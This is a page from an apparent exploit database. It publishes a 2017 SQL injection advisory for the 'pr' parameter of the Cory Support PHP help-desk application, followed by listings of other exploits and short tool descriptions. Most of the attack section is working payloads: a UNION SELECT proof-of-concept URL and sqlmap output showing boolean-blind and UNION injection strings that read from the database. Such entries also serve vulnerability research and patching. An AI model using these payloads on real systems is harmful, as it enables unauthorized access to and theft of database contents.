Menu

Search for hundreds of thousands of exploits

"Cory Support - 'pr' SQL Injection"

Author

Exploit author

v3n0m

Platform

Exploit platform

php

Release date

Exploit published date

2017-09-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Exploit   : Cory Support (pr) SQL Injection Vulnerability
# Author    : v3n0m
# Contact   : v3n0m[at]outlook[dot]com
# Date      : September, 06-2017 GMT +7:00 Jakarta, Indonesia
# Developer : Cory App
# Software  : Cory Support
# App Link  : http://coryapp.com/?product&index
# Demo      : http://coryapp.com/demo/support/
# Tested On : Mac OS Sierra v10.12.6
# Credits   : YOGYACARDERLINK, Dhea Dayanaya Fathin Karima, Don't Touch Me (Line Group) & Muhammad Panji, Alfath Dirk, Cafe BMW & YOU !!
 
1. Description
 
An attacker can exploit this vulnerability to read from the database.
The parameter 'pr' is vulnerable.
 
 
2. Proof of Concept
 
http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()--
 
# Exploitation via SQLMap
 
Parameter: pr (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pr=1 AND 4809=4809
    Vector: AND [INFERENCE]

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi
    Vector:  UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
 
 
3. Security Risk
 
The security risk of the remote sql-injection web vulnerability in the Cory Support is estimated as high.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-09 "FrootVPN 4.8 - 'frootvpn' Unquoted Service Path" local windows v3n0m
2017-09-06 "Cory Support - 'pr' SQL Injection" webapps php v3n0m
2017-01-11 "iTechscripts Freelancer Script 5.11 - 'sk' SQL Injection" webapps php v3n0m
2017-01-09 "Friends in War Make or Break 1.7 - 'imgid' SQL Injection" webapps php v3n0m
2012-12-26 "Guru Auction 2.0 - Multiple SQL Injections" webapps php v3n0m
2012-01-20 "ICTimeAttendance - Authentication Bypass" webapps asp v3n0m
2011-08-17 "SoftwareDEP Classified Script 2.5 - SQL Injection (1)" webapps php v3n0m
2011-07-31 "Joomla! Component obSuggest - Local File Inclusion" webapps php v3n0m
2011-07-21 "Joomla! Component JE Story Submit - Local File Inclusion" webapps php v3n0m
2011-05-30 "Guru JustAnswer Professional 1.25 - Multiple SQL Injections" webapps php v3n0m
2011-05-28 "Guru Penny Auction Pro 3.0 - Blind SQL Injection" webapps php v3n0m
2010-12-24 "iDevSpot iDevCart 1.10 - Multiple Local File Inclusions" webapps php v3n0m
2010-12-20 "Joomla! Component JotLoader 2.2.1 - Local File Inclusion" webapps php v3n0m
2010-12-17 "Softbiz PHP Joke Site Software - Multiple SQL Injections" webapps php v3n0m
2010-11-16 "BPConferenceReporting Web Reporting - Authentication Bypass" webapps asp v3n0m
2010-11-16 "BPDirectory Business Directory - Authentication Bypass" webapps asp v3n0m
2010-11-16 "BPAffiliate Affiliate Tracking - Authentication Bypass" webapps asp v3n0m
2010-11-16 "BPRealestate Real Estate - Authentication Bypass" webapps asp v3n0m
2010-11-16 "Joomla! Component com_maianmedia - SQL Injection" webapps php v3n0m
2010-11-14 "BSI Advance Hotel Booking System 1.0 - SQL Injection" webapps php v3n0m
2010-11-13 "Webmatic - 'index.php' SQL Injection" webapps php v3n0m
2010-10-12 "AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit)" webapps php v3n0m
2010-08-07 "Joomla! Component NeoRecruit 1.4 - SQL Injection" webapps php v3n0m
2010-07-10 "My Kazaam Address & Contact ORGanizer - SQL Injection" webapps php v3n0m
2010-07-10 "Joomla! Component redSHOP 1.0 - 'pid' SQL Injection" webapps php v3n0m
2010-07-02 "Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)" dos windows v3n0m
2010-06-30 "Joomla! Component Gamesbox 1.0.2 - 'id' SQL Injection" webapps php v3n0m
2010-06-29 "YPNinc JokeScript - 'ypncat_id' SQL Injection" webapps php v3n0m
2010-06-29 "PageDirector CMS - 'result.php' SQL Injection" webapps php v3n0m
2010-06-29 "YPNinc PHP Realty Script - 'docID' SQL Injection" webapps php v3n0m
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.